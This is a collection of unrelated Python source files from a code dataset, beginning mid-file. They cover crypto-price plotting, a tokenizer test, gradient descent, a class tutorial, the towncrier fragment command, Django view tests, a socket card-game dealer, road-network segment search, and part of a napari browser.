s3.append(sum(w[t][3]))\n\n\nprint('here',np.array(s0)+np.array(s1)+np.array(s2))\ns0=np.array(s0)\ns1=np.array(s1)\n\ns2=np.array(s2)\ns3=np.array(s3)\n\nplt.bar(range(np.size(s0)), s0,color='g', label='Low Variance, Stable', width=1)\nplt.bar(range(np.size(s0)),s1,color='r', bottom=s0,label = 'High Variance, Stable', width=1)\nplt.bar(range(np.size(s0)),s2,color='b', bottom=s0+s1,label = 'Low Variance, Trending', width=1)\nplt.bar(range(np.size(s0)),s3,color='c', bottom=s0+s1+s2,label = 'High Variance, Trending', width=1)\n\n\nplt.legend(loc = 'lower left')\nplt.show()\n\nx,beta = RTSLinearSmoother(p,V,f,F,w,5)\nprint('x[5]',x[5])\nmass_aprox = np.zeros(shape = [S,T])\nfor t in range(T):\n for s in range(S):\n mass_aprox[s, t] = sum(sum(x[t][s]))\n\nprint('mass check sum 1',np.sum(mass_aprox,axis=0))\nfig, ax1 = plt.subplots()\nax1.plot(df2['time'],df2['vwap'],c='k')\n\n\nax1.set_title('BTCUSD VWAP')\nax2 = ax1.twinx()\n\nplt.show()\n\nplt.bar(range(np.size(mass_aprox[0])), mass_aprox[0],color='g', label='Low Variance, Stable', width=1, alpha = .5)\nplt.bar(range(np.size(mass_aprox[0])),mass_aprox[1],color='r', bottom=mass_aprox[0],label = 'High Variance, Stable', width=1, alpha = .5)\nplt.bar(range(np.size(mass_aprox[0])),mass_aprox[2],color='b', bottom=mass_aprox[0]+mass_aprox[1],label = 'Low Variance, Trending', width=1, alpha = .5)\nplt.bar(range(np.size(mass_aprox[0])),mass_aprox[3],color='c', bottom=mass_aprox[0]+mass_aprox[1]+mass_aprox[2],label = 'High Variance, Trending', width=1, alpha = .5)\n\nplt.legend(loc = 'lower left')\nplt.twinx()\nplt.plot(df2['vwap'].tolist(),label='VWAP',c='k')\nplt.show()\n\n\n","sub_path":"SRLDS/btcusd_volatility_levels.py","file_name":"btcusd_volatility_levels.py","file_ext":"py","file_size_in_byte":4713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"319812140","text":"from unittest import TestCase\n\nfrom src.pdf_processing.utils.WordTokenizer import removeCommonWordsAndTokenize\n\n\nclass WordTokenizeTest(TestCase):\n\n def test_english_sentence_splitter(self):\n sentence = \"9 šis teikums saSTāv no burtiem a b c 33333333 \"\n words = removeCommonWordsAndTokenize(sentence)\n\n for a in words:\n print(a)\n\n correctWords = ['SKAITLIS', 'šis', 'teikums', 'sastāv', 'burtiem', 'SKAITLIS']\n self.assertTrue(words == correctWords)\n","sub_path":"test/pdf_processing/utils/test_WordTokenize.py","file_name":"test_WordTokenize.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"180869804","text":"import numpy as np\r\nimport pandas as pd\r\nfrom sklearn.linear_model import LinearRegression\r\nimport math\r\n#trovo m e b con il classico sklearn\r\ndef predict_using_sklearn() :\r\n df = pd.read_csv(\"test_scores.csv\")\r\n r = LinearRegression()\r\n r.fit(df[[\"math\"]],df.cs)\r\n return r.coef_,r.intercept_\r\n\r\n\r\n#adesso uso il gradiend descend per trovare sempre il coefficente e l'intercetta\r\n\r\ndef gradient_descend(x,y): \r\n m_curr=0\r\n b_curr=0\r\n iterations=1000000\r\n n=len(x)\r\n learning_rate=0.0002\r\n cost_previous=0\r\n \r\n for i in range(iterations):\r\n y_predicted = m_curr*x + b_curr\r\n cost= (1/n)*sum([value**2 for value in (y-y_predicted)])\r\n md = -(2/n)*sum(x*(y-y_predicted))\r\n bd = -(2/n)*sum(y-y_predicted)\r\n m_curr = m_curr - learning_rate*md\r\n b_curr = b_curr - learning_rate*bd\r\n if math.isclose(cost,cost_previous,rel_tol=1e-20):\r\n break\r\n 
cost_previous=cost\r\n print(\"m {},b {},cost {}, iteration {}\".format(m_curr,b_curr,cost,i))\r\n \r\n \r\n return m_curr,b_curr \r\n\r\nif __name__ ==\"__main__\":\r\n df = pd.read_csv(\"test_scores.csv\")\r\n x= np.array(df.math)\r\n y= np.array(df.cs)\r\n \r\n \r\n m,b = gradient_descend(x,y)\r\n print(\"using gradient descent function: Coef {}, Intercept {}\".format(m,b))\r\n \r\n \r\n m_sklearn,b_sklearn =predict_using_sklearn()\r\n print(\"using sklearn: Coef {}, Intercept {}\".format(m_sklearn,b_sklearn))","sub_path":"MACHINE LEARNING CODEBASICS/Gradient Descent and cost function/exercise.py","file_name":"exercise.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"186046437","text":"class student:\n age = 0\n name = \"\"\n score = 0\n\n # Classes in Python also have access levels for their members\n # The three attributes above are public attributes of the class\n # Inside the class, private methods and members must be accessed through self, i.e. self.__name\n\n __pri = 3 # members starting with a double underscore are private and cannot be accessed from outside the class\n _pro = 2 # a single leading underscore marks a protected member\n\n def getPri(self): # when defining a method, it must include the self parameter, and self must come first\n return self.__pri # self is the equivalent of the this pointer in C++\n\n def setPri(self, pri):\n self.__pri = pri\n\n def fun(self):\n print('Hello World')\n\n # Now let's look at the special methods of a class\n # Special methods are essentially the constructor, the destructor, and functions similar to C++ operator overloading\n def __init__(self, name, age, score): # constructor\n self.name = name\n self.age = age\n self.score = score\n\n def __del__(self): # destructor\n del self.name\n del self.age\n del self.score\n print('__del__')\n\n def __add__(self, other): # similar to an overloaded operator; each method overloads exactly one operator\n return self.age + other.age\n\n def __repr__(self): # printing / string conversion\n return self.name\n\n def __setitem__(self, key, value): # assign a value by index\n if key == 1:\n self.name = value\n else:\n self.score = value\n\n def __getitem__(self, item):\n if item == 1:\n return self.name\n else:\n return self.score\n\n\na = student('lyst', 18, 100) # instantiate object a, which calls the constructor\na.fun() # call a method of the class\nprint(\"student's age is \", a.age)\nprint(a._pro)\na.setPri(5) # the first self parameter is passed implicitly\nprint(a.getPri())\nb = student('wth', 19, 100)\nprint(a + b)\nprint(a)\n# assign by index and read back by index\na.__setitem__(1, \"liuinstein\")\nprint(a.__getitem__(1))\n\n","sub_path":"08_类和对象/08_类和对象.py","file_name":"08_类和对象.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"115666302","text":"\"\"\"Module unit tests.\n\nThis module is used to run unit tests for each function from primeNumber.py\n\"\"\"\n# Author: Barbana Klimekova \n# Lucia Kubaskova \n# Tomas_Prikasky \n#\n# Description: Create unit tests to validate units from primeNumber.py\n# Units: functions isPrimeNumber(), getDivisors(), main()\n# TestCases: 1. prime number validation\n# 2. non-prime number validation\n# 3. divisors validation\n# 4.
 printed outputs validation\nimport builtins\nfrom primeNumber import isPrimeNumber, getDivisors, main\nimport unittest\nfrom unittest.mock import patch\n\n\nclass TestPrimeNumber(unittest.TestCase):\n \"\"\"Class TestPrimeNumber for testing the functions from primeNumber.py.\n\n ...\n Methods\n -------\n test_isPrime(self, ):\n - Validates that 5 is a prime number and that 6 and 8 are not\n test_getDivisors(self, ):\n - Validates the lists of divisors returned for 5 and 6\n \"\"\"\n\n def test_isPrime(self, ):\n \"\"\"Test for isPrimeNumber().\n\n Asserts that isPrimeNumber() returns True for the prime number 5\n and False for the non-prime numbers 6 and 8.\n \"\"\"\n self.assertEqual(isPrimeNumber(5), True)\n self.assertEqual(isPrimeNumber(6), False)\n self.assertEqual(isPrimeNumber(8), False)\n\n def test_getDivisors(self, ):\n \"\"\"Test for getDivisors().\n\n Asserts that getDivisors() returns the complete list of divisors,\n i.e. [1, 5] for 5 and [1, 2, 3, 6] for 6.\n \"\"\"\n self.assertEqual(getDivisors(5), [1, 5])\n self.assertEqual(getDivisors(6), [1, 2, 3, 6])\n\n\nclass TestPrintedValues(unittest.TestCase):\n \"\"\"Class TestPrintedValues for testing the console output of main().\n\n ...\n Methods\n -------\n test_main_negative(self, ):\n - Validates the error message printed when a negative number is entered\n test_main_string(self, ):\n - Validates the error message printed when the input is not a number\n \"\"\"\n\n @patch('builtins.input', side_effect=['-1'])\n def test_main_negative(self, _):\n \"\"\"Function for the negative-number main test use case.\"\"\"\n print_values = []\n builtins.print = lambda s: print_values.append(s)\n main()\n assert print_values == [\"Nebylo zadáno kladne číslo\"]\n\n @patch('builtins.input', side_effect=['foo'])\n def test_main_string(self, _):\n \"\"\"Function for the string-input main test use case.\"\"\"\n print_values = []\n builtins.print = lambda s: print_values.append(s)\n main()\n assert print_values == [\"Nebylo zadáno číslo\"]\n\n# print documentation using pydoc.\n# print documentation for class\n","sub_path":"test_primeNumber.py","file_name":"test_primeNumber.py","file_ext":"py","file_size_in_byte":3610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"393907504","text":"# Copyright (c) Stephen Finucane, 2019\n# See LICENSE for details.\n\n\"\"\"\nCreate a new fragment.\n\"\"\"\n\nfrom __future__ import absolute_import\n\nimport os\nimport click\n\nfrom ._settings import load_config_from_options\n\n\n@click.command(name=\"create\")\n@click.option(\"--dir\", \"directory\", default=None)\n@click.option(\"--config\", \"config\", default=None)\n@click.argument(\"filename\")\ndef _main(directory, config, filename):\n return __main(directory, config, filename)\n\n\ndef __main(directory, config, filename):\n \"\"\"\n The main entry point.\n \"\"\"\n base_directory, config = load_config_from_options(directory, config)\n\n definitions = config[\"types\"] or []\n if len(filename.split(\".\")) < 2 or (\n
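# the fragment type may be the last or the second-to-last dotted segment,\n # so both '123.feature' and '123.feature.rst' style names are accepted\n 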
filename.split(\".\")[-1] not in definitions\n and filename.split(\".\")[-2] not in definitions\n ):\n raise click.BadParameter(\n \"Expected filename '{}' to be of format '{{name}}.{{type}}', \"\n \"where '{{name}}' is an arbitrary slug and '{{type}}' is \"\n \"one of: {}\".format(filename, \", \".join(definitions))\n )\n\n if config.get(\"directory\"):\n fragments_directory = os.path.abspath(\n os.path.join(base_directory, config[\"directory\"])\n )\n else:\n fragments_directory = os.path.abspath(\n os.path.join(\n base_directory,\n config[\"package_dir\"],\n config[\"package\"],\n \"newsfragments\",\n )\n )\n\n if not os.path.exists(fragments_directory):\n os.makedirs(fragments_directory)\n\n segment_file = os.path.join(fragments_directory, filename)\n if os.path.exists(segment_file):\n raise click.ClickException(\"{} already exists\".format(segment_file))\n\n with open(segment_file, \"w\") as f:\n f.writelines([\"Add your info here\"])\n\n click.echo(\"Created news fragment at {}\".format(segment_file))\n\n\nif __name__ == \"__main__\": # pragma: no cover\n _main()\n","sub_path":"src/towncrier/create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"582988197","text":"from django.urls import reverse\n\nfrom applications.subscription.models import Post\nfrom applications.subscription.tests.factories import PostFactory\n\n\nHTTP_200_OK = 200\nHTTP_302_REDIRECT = 302\nHTTP_404_NOT_FOUND = 404\n\n\ndef test_post_list(user_logged_client, user):\n for _ in range(3):\n PostFactory()\n\n for _ in range(3):\n PostFactory(user=user)\n\n url = reverse('subscription:post_list_view')\n response = user_logged_client.get(url)\n assert response.status_code == HTTP_200_OK\n assert (\n set(response.context_data['object_list']) ==\n set(Post.objects.filter(user=user))\n )\n\n\ndef test_post_detail(user_logged_client, user):\n post_out_of_view = PostFactory()\n post_in_view = PostFactory(user=user)\n\n url = reverse(\n 'subscription:post_detail_view',\n kwargs={'pk': post_in_view.pk}\n )\n response = user_logged_client.get(url)\n\n assert (\n set([response.context_data['object'], ]) ==\n set(Post.objects.filter(user=user))\n )\n\n url = reverse(\n 'subscription:subscription_detail_view',\n kwargs={'pk': post_out_of_view.pk}\n )\n response = user_logged_client.get(url)\n assert response.status_code == HTTP_404_NOT_FOUND\n\n\ndef test_post_mark_as_read(user_logged_client, user):\n post = PostFactory(user=user, is_read=False)\n assert not post.is_read\n\n url = reverse('subscription:post_detail_view', kwargs={'pk': post.pk})\n user_logged_client.get(url)\n\n post.refresh_from_db()\n assert post.is_read\n\n\ndef test_post_update(user_logged_client, user):\n post = PostFactory(\n user=user,\n is_favourite=False,\n comment=''\n )\n assert not post.is_favourite\n assert post.comment == ''\n\n url = reverse('subscription:post_update_view', kwargs={'pk': post.pk})\n data = {\n 'is_favourite': True,\n 'comment': 'COMMENT'\n }\n response = user_logged_client.post(url, data, follow=True)\n assert response.status_code == HTTP_200_OK\n\n post.refresh_from_db()\n assert post.is_favourite == data['is_favourite']\n assert post.comment == data['comment']\n\n assert response.context_data['object'].is_favourite == data['is_favourite']\n assert response.context_data['object'].comment == data['comment']\n\n\ndef test_post_new(user_logged_client, user):\n for _ in range(2):\n PostFactory(user=user, 
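# already read, so these must be excluded from the post_new_view results checked below\n 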
is_read=True)\n\n for _ in range(3):\n PostFactory(user=user, is_read=False)\n\n url = reverse('subscription:post_new_view')\n response = user_logged_client.get(url)\n assert response.status_code == HTTP_200_OK\n assert response.context_data['object_list'].count() == 3\n assert (\n set(response.context_data['object_list']) ==\n set(Post.objects.filter(user=user, is_read=False))\n )\n\n\ndef test_post_favourites(user_logged_client, user):\n for _ in range(3):\n PostFactory(user=user, is_favourite=False)\n\n for _ in range(2):\n PostFactory(user=user, is_favourite=True)\n\n url = reverse('subscription:post_favourites_view')\n response = user_logged_client.get(url)\n assert response.status_code == HTTP_200_OK\n assert response.context_data['object_list'].count() == 2\n assert (\n set(response.context_data['object_list']) ==\n set(Post.objects.filter(user=user, is_favourite=True))\n )\n","sub_path":"feedo/applications/subscription/tests/test_posts.py","file_name":"test_posts.py","file_ext":"py","file_size_in_byte":3332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"98526768","text":"\nimport socket\nimport pickle\nimport threading\nimport re\nfrom random import randint\nimport time\nfrom tkinter import *\nfrom tkinter import font\nimport os\nfrom tkinter import messagebox\nfrom coins import *\nclients=[]\nname=[]\nclient_id=-1\ntimer=-1\nserver=13\ndraw=0\nclient=13\nroot = None\nmain = Tk()\nnr1=0\nw=None\nnr2=0\nbalance=0\nabort=0\np1=[\"2C.png\",\"3C.png\",\"4C.png\",\"5C.png\",\"6C.png\",\"7C.png\",\"8C.png\",\"9C.png\",\"10C.png\",\"JC.png\",\"QC.png\",\"KC.png\",\"AC.png\",\"pack.png\"]\np2=[\"2S.png\",\"3S.png\",\"4S.png\",\"5S.png\",\"6S.png\",\"7S.png\",\"8S.png\",\"9S.png\",\"10S.png\",\"JS.png\",\"QS.png\",\"KS.png\",\"AS.png\",\"pack.png\"]\np3=[\"2H.png\",\"3H.png\",\"4H.png\",\"5H.png\",\"6H.png\",\"7H.png\",\"8H.png\",\"9H.png\",\"10H.png\",\"JH.png\",\"QH.png\",\"KH.png\",\"AH.png\",\"pack.png\"]\np4=[\"2D.png\",\"3D.png\",\"4D.png\",\"5D.png\",\"6D.png\",\"7D.png\",\"8D.png\",\"9D.png\",\"10D.png\",\"JD.png\",\"QD.png\",\"KD.png\",\"AD.png\",\"pack.png\"]\nsignal=\"\"\nsignal_disconnected=\"\"\nwin_loose=\"\"\nusername=StringVar()\naddress=StringVar()\npassword=StringVar()\nport=StringVar()\n# username.set(\"user3070554556\")\n# password.set(\"pass6e261696532cd591acf639b17af3c17b1dd3fc09af4b609863d6698590b1555299\")\n# address.set(\"RGwNq9jdiD3B9WcjY14SkPawb8iVhXPQwT\")\n# port.set(11060)\nclass handle_client(threading.Thread):\n def __init__(self):\n threading.Thread.__init__(self)\n def run(self):\n s=socket.socket()\n port=7398\n s.bind(('',port))\n s.listen(5)\n flag=0\n count=0\n while(True):\n c, addr = s.accept()\n if(len(clients)==0):\n count=1\n else:\n x=sorted(clients)\n count=int(x[len(clients)-1])+1\n t=myThread(c,count)\n t.start()\nclass myThread(threading.Thread):\n def __init__(self,c,id):\n threading.Thread.__init__(self)\n self.c=c\n self.id=id\n self.n=\"\"\n self.msg=100\n self.client_num=13\n self.dealer_num=13\n self.caddress=\"\"\n def run(self):\n err=0\n clients.append(self.id)\n global signal_disconnected\n if(len(clients)==4):\n clients.remove(self.id)\n self.msg = 404\n data = pickle.dumps(self.msg)\n self.c.send(data)\n else:\n global timer,server,client,nr1,nr2,win_loose,balance,w\n send_num=-1\n while (True):\n if(abort==1):\n break\n try:\n if(self.msg==100):\n self.msg=\"201\"+\":\"+address.get()\n elif(send_num==0):\n num=randint(0,12)\n self.dealer_num=num\n server=num\n 
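# pick a random suit index (0-3) for the dealer's card; the rank (0-12) was drawn above\n 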
nr1=randint(0,3)\n self.msg=\"num:\"+str(num)+\":\"+str(nr1)\n else:\n self.msg=200\n data = pickle.dumps(self.msg)\n self.c.send(data)\n rdata = pickle.loads(self.c.recv(1024))\n if(send_num==0):\n display=rdata\n dummy,x,y=rdata.split(\":\")\n x=int(x)\n y=int(y)\n self.client_num=x\n client=x\n nr2=y\n send_num=1\n if(rdata==700):\n send_num=0\n if(re.search(\"^201:*\",str(self.msg))!=None):\n self.caddress=rdata\n if(rdata in name):\n self.msg=400\n data = pickle.dumps(self.msg)\n self.c.send(data)\n raise Exception(\"Client is already connected\")\n else:\n self.n=rdata\n name.append(self.n)\n self.msg=200\n if(re.search(\"^num:*\",str(rdata))!=None):\n display=rdata\n dummy,x,y=rdata.split(\":\")\n x=int(x)\n y=int(y)\n self.client_num=x\n client=x\n nr2=y\n if(self.client_num!=13 and self.dealer_num!=13):\n if(self.client_num>=self.dealer_num):\n win_loose=\"You lost 10 chips\"\n w.send(self.n)\n else:\n win_loose=\"You won 10 chips\"\n w.recv(address.get())\n self.client_num=13\n self.dealer_num=13\n except Exception as e:\n err=1\n if(self.n!=\"\"):\n signal_disconnected=str(self.n)+\" disconnected\"\n clients.remove(self.id)\n if(self.n!=\"\"):\n name.remove(self.n)\n break\nmyFont = font.Font(size=15)\nmyFont1 = font.Font(size=15)\nLabel(main).pack()\nlabel_add=Label(main,text=\"Enter your username\")\nlabel_add['font']=myFont\nlabel_add.pack()\nLabel(main).pack()\nuser=Entry(main,textvariable=username)\nuser['font']=myFont\nuser.pack()\nLabel(main).pack()\nLabel(main).pack()\nlabel_add=Label(main,text=\"Enter your password\")\nlabel_add['font']=myFont\nlabel_add.pack()\nLabel(main).pack()\nuser1=Entry(main,textvariable=password)\nuser1['font']=myFont\nuser1.pack()\nLabel(main).pack()\nlabel_add=Label(main,text=\"Enter your address\")\nlabel_add['font']=myFont\nlabel_add.pack()\nLabel(main).pack()\nuser2=Entry(main,textvariable=address)\nuser2['font']=myFont\nuser2.pack()\nLabel(main).pack()\nlabel_add=Label(main,text=\"Enter port number\")\nlabel_add['font']=myFont\nlabel_add.pack()\nLabel(main).pack()\nuser3=Entry(main,textvariable=port)\nuser3['font']=myFont\nuser3.pack()\nLabel(main).pack()\ndef newwindow():\n global root,w\n w=coins(username.get(),password.get(),port.get())\n balance=w.getbalance()\n if(w.login()):\n main.withdraw()\n root=Toplevel()\n def close_window():\n root.destroy()\n os._exit(0)\n def retry():\n global draw\n draw=1\n root.geometry(\"800x900\")\n Label(root).pack()\n hc=handle_client()\n hc.start()\n Label(main).pack()\n warning=Label(main,text=\"\")\n warning['font']=myFont\n warning.pack()\n Label(main).pack()\n logo = PhotoImage(file=\"resources/\"+\"chip1.png\")\n w1 = Label(root, image=logo).pack()\n Label(root).pack()\n dstatus=Label(root)\n dstatus['font']=myFont1\n dstatus.pack()\n Label(root).pack()\n dealer=Label(root,text=\"Dealer's card\")\n dealer['font']=myFont\n dealer.pack()\n Label(root).pack()\n lab = Label(root)\n lab['font']=myFont1\n photo = PhotoImage(file=\"resources/\"+\"pack.png\")\n lab.config(image=photo)\n lab.pack()\n Label(root).pack()\n player=Label(root,text=\"Player's card\")\n player['font']=myFont\n player.pack()\n Label(root).pack()\n lab1 = Label(root)\n lab1['font']=myFont\n photo1 = PhotoImage(file=\"resources/\"+\"pack.png\")\n lab1.config(image=photo1)\n lab1.pack()\n Label(root).pack()\n warning=Label(root)\n warning['font']=myFont\n warning.pack()\n def update():\n dstatus.config(text=\"Current balance : $\"+w.getbalance())\n warning.config(text=win_loose)\n if(float(balance)<10):\n print(\"Insufficient amount of
 money to play, please add some money and then try again\")\n os._exit(0)\n if(nr1==0):\n x1=p1\n elif(nr1==1):\n x1=p2\n elif(nr1==2):\n x1=p3\n else:\n x1=p4\n if(nr2==0):\n x2=p1\n elif(nr2==1):\n x2=p2\n elif(nr2==2):\n x2=p3\n else:\n x2=p4\n photo = PhotoImage(file=\"resources/\"+x1[int(server)])\n photo1 = PhotoImage(file=\"resources/\"+x2[int(client)])\n lab.config(image=photo)\n lab1.config(image=photo1)\n lab.image=photo\n lab1.image=photo1\n root.after(100, update)\n update()\n Label(root).pack()\n def doSomething():\n os._exit(0)\n root.protocol('WM_DELETE_WINDOW', doSomething)\n root.mainloop()\n else:\n warning.config(text=\"Invalid credentials, please try again\")\n password.set(\"\")\n address.set(\"\")\n username.set(\"\")\nbtn=Button(main,text=\"Login and play\",command=newwindow)\nbtn['font']=myFont\nbtn.pack()\nmain.geometry(\"600x600\")\ndef doSomething():\n os._exit(0)\nmain.protocol('WM_DELETE_WINDOW', doSomething)\nmain.mainloop()","sub_path":"dealer.py","file_name":"dealer.py","file_ext":"py","file_size_in_byte":8979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"221271821","text":"import geopandas as gpd\nimport networkx as nx\nimport matplotlib.pyplot as plt\nimport osmnx as ox\nimport numpy as np\nimport shapely.geometry as geom\nimport h5py as h5\n\nclass segment:\n def __init__(self, edge = None):\n if edge is None:\n #Do nothing\n pass\n else:\n #initialize with the given edge as a one-edge segment\n self.start_node = edge[0]\n self.num = 1\n self.path = np.array(edge[1:3],dtype = [('node','i4'),('id','i4')])\n self.past_node = self.start_node\n self.last_node = edge[1]\n self.length = edge[-1]['length']\n self.angle = edge[-1]['angle']\n self.edgelist = {edge[:3]:True}\n self.total_angle = np.array([0],dtype = np.float32)\n\n def expand(self, edge):\n '''return copy of segment appending extra edge '''\n temp = segment()\n temp.start_node = self.start_node\n temp.past_node = edge[0]\n temp.last_node = edge[1]\n temp.num = self.num+1\n temp.path = np.empty([temp.num],dtype = [('node','i4'),('id','i4')])\n temp.path[:-1] = self.path\n temp.path[-1] = edge[1:3]\n temp.length = self.length + edge[-1]['length']\n temp.angle = edge[-1]['angle']\n temp.edgelist = {edge[:3]:True}\n for e in self.edgelist:\n temp.edgelist[e] = True\n temp.total_angle = np.zeros([temp.num],dtype = np.float32)\n temp.total_angle[:-1] = self.total_angle + temp.angle- self.angle\n return temp\n\n def check(self, k):\n '''check stopping condition: length exceeds k or the total turn exceeds a full circle'''\n return self.length> k or self.total_angle[-1]<-2*np.pi or self.total_angle[-1]>2*np.pi #(self.total_angle <-2*np.pi).any() or (self.total_angle > 2*np.pi).any()\n\n def overlap(self, edge):\n '''check overlap with given edge'''\n if self.num == 1:\n return False\n return edge[:3] in self.edgelist\n\n def __repr__(self):\n return \"<segment from {} to {} with {} edges>\".format(self.start_node, self.last_node, self.num)\n\n def __lt__(self, other):\n '''sorting'''\n return self.length<other.length\n\n def __gt__(self, other):\n '''sorting'''\n return self.length>other.length\n\n def __le__(self, other):\n '''sorting'''\n return self.length<=other.length\n\n def __ge__(self, other):\n '''sorting'''\n return self.length>=other.length\n\n def edges(self):\n '''return edgelist'''\n e = []\n temp = self.start_node\n for p in self.path:\n e.append((temp,p['node'],p['id']))\n temp = p['node']\n return e\n\n def nodes(self):\n '''return node list'''\n n = [self.start_node]\n if self.num == 1:\n n.append(self.path['node'])\n return n\n for p in self.path:\n n.append(p['node'])\n return n\n\n def plot(self, pos,
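# pos: mapping from node id to (x, y) coordinates, e.g. the Roadnetwork.pos property below\n 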
 *arg,**kwarg):\n '''plot the segment as a path graph at the given node positions'''\n temp = nx.path_graph(self.num+1,create_using=nx.DiGraph)\n position = {}\n for i,n in enumerate(self.nodes()):\n position[i] = pos[n]\n nx.draw(temp, position, *arg, **kwarg)\n\n def stitch_score(self, other):\n pass\n\n\nclass Roadnetwork(nx.MultiDiGraph):\n def __init__(self):\n super().__init__()\n\n def pos():\n doc = '''return position dictionary'''\n def fget(self):\n return self.nodes(data = 'pos')\n return locals()\n pos = property(**pos())\n\n\n def subgraph_of_node(self, node, depth_limit = 2):\n \"\"\"return subgraph of given node with bfs manner\n\n Parameters\n ----------\n node : node id\n center node of the subgraph.\n depth_limit : int\n BFS depth limit around the center node.\n\n Returns\n -------\n nx.MultiDiGraph\n subgraph induced by the BFS neighborhood of node.\n\n \"\"\"\n\n nodes = {node : 0}\n for edge in nx.bfs_edges(self, node, depth_limit= depth_limit):\n nodes[edge[1]] = 0\n\n nodes = list(nodes.keys())\n if depth_limit == 0:\n nodes = [node]\n return self.subgraph(nodes)\n\n def nn_nodes(G, node, depth_limit = 2):\n '''return nodes from given node with bfs manner'''\n nodes = {node : 0}\n for edge in nx.bfs_edges(G, node, depth_limit= depth_limit):\n nodes[edge[1]] = 0\n\n nodes = list(nodes.keys())\n if depth_limit == 0:\n nodes = [node]\n return nodes\n\n\n\n def edge_plot(G):\n '''plot edges in given graph'''\n for i in G.edges(data = 'geometry'):\n plt.plot(*i[2].xy)\n\n def edgelist_plot(G, edgelist):\n '''plot edges in given edgelist '''\n for edge in edgelist:\n plt.plot(*G.edges[edge]['geometry'].xy)\n\n def subgraph_plot(G, node, depth_limit = 2):\n '''build the BFS subgraph around node and plot it'''\n sub = G.subgraph_of_node(node, depth_limit)\n node_pos = sub.pos[node]\n\n sub.edge_plot()\n plt.scatter(*node_pos, s= 100)\n\n\n\n\n\ndef k_segments(G, node, k= 100):\n '''k_segments with only breadth-first searching'''\n segments = [segment(edge) for edge in G.edges(node,keys = True, data = True)]\n k_segments = []\n iter_num = 0\n while segments:\n iter_num += 1\n target = segments.pop(0)\n ch = False\n #print(\"target : {},{}\".format(target.past_node, target.last_node))\n for edge in G.edges(target.last_node, keys = True, data = True):\n if edge[1] == target.past_node or target.overlap(edge): continue\n #print(\"to : {}, {}\".format(edge[0], edge[1]))\n ch = True\n temp = target.expand(edge)\n if temp.check(k):\n k_segments.append(temp)\n else:\n segments.append(temp)\n if not ch:\n k_segments.append(target)\n if iter_num == 1e5:\n print(node)\n #print(k_segments)\n return k_segments\n\ndef k_segments_strict_bfs(G, node, k= 100):\n '''no overlapping node'''\n segments = [segment(edge) for edge in G.edges(node,keys = True, data = True)]\n k_segments
= []\n nodes = {node :True}\n iter_num = 0\n segments.sort()\n while segments:\n iter_num += 1\n target = segments.pop(0)\n ch = False\n #print(\"target : {},{}\".format(target.past_node, target.last_node))\n for edge in G.edges(target.last_node, keys = True, data = True):\n if edge[1] in nodes: continue\n #print(\"to : {}, {}\".format(edge[0], edge[1]))\n ch = True\n nodes[edge[1]] = True\n temp = target.expand(edge)\n if temp.check(k):\n k_segments.append(temp)\n else:\n segments.append(temp)\n if not ch:\n k_segments.append(target)\n if iter_num == 1e5:\n print(node)\n #print(k_segments)\n segments.sort()\n return k_segments\n\ndef k_segments_semi_strict_bfs(G, node, k= 100):\n '''no overlap within single segment.'''\n segments = [segment(edge) for edge in G.edges(node,keys = True, data = True)]\n k_segments = []\n nodes = {node :True}\n iter_num = 0\n while segments:\n iter_num += 1\n target = segments.pop(0)\n ch = False\n #print(\"target : {},{}\".format(target.past_node, target.last_node))\n for edge in G.edges(target.last_node, keys = True, data = True):\n if edge[1] in target.nodes(): continue\n #print(\"to : {}, {}\".format(edge[0], edge[1]))\n ch = True\n nodes[edge[1]] = True\n temp = target.expand(edge)\n if temp.check(k):\n k_segments.append(temp)\n else:\n segments.append(temp)\n #if not ch:\n #k_segments.append(target)\n if iter_num == 1e5:\n print(node)\n #print(k_segments)\n return k_segments\n","sub_path":"taxidata/core/network/ksegment.py","file_name":"ksegment.py","file_ext":"py","file_size_in_byte":8956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"69194080","text":"# -*- coding: utf-8 -*-\n\n#################################################################\n# File : napari_browser_cz.py\n# Version : 0.0.6\n# Author : czsrh\n# Date : 18.01.2020\n# Institution : Carl Zeiss Microscopy GmbH\n#\n# Disclaimer: This tool is purely experimental. Feel free to\n# use it at your own risk.\n#\n# Copyright (c) 2020 Carl Zeiss AG, Germany. 
All Rights Reserved.\n#\n#################################################################\n\nfrom PyQt5.QtWidgets import (\n\n QHBoxLayout,\n QVBoxLayout,\n QFileSystemModel,\n QFileDialog,\n QTreeView,\n QDialogButtonBox,\n QWidget,\n QTableWidget,\n QTableWidgetItem,\n QCheckBox,\n QAbstractItemView,\n QComboBox,\n QPushButton,\n QLineEdit,\n QLabel,\n QGridLayout\n\n)\n\nfrom PyQt5.QtCore import Qt, QDir, QSortFilterProxyModel\nfrom PyQt5.QtCore import pyqtSlot\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtGui import QFont\n\nimport napari\nimport numpy as np\nimport md_tools as imf\nfrom aicsimageio import AICSImage\nimport dask.array as da\nimport os\nfrom zencontrol import ZenExperiment, ZenDocuments\nfrom pathlib import Path\n\n\nclass TableWidget(QWidget):\n\n def __init__(self):\n super(QWidget, self).__init__()\n self.layout = QVBoxLayout(self)\n self.mdtable = QTableWidget()\n self.layout.addWidget(self.mdtable)\n self.mdtable.setShowGrid(True)\n self.mdtable.setHorizontalHeaderLabels(['Parameter', 'Value'])\n header = self.mdtable.horizontalHeader()\n header.setDefaultAlignment(Qt.AlignLeft)\n\n def update_metadata(self, metadata):\n\n # number of rows is set to number of metadata entries\n row_count = len(metadata)\n col_count = 2\n self.mdtable.setColumnCount(col_count)\n 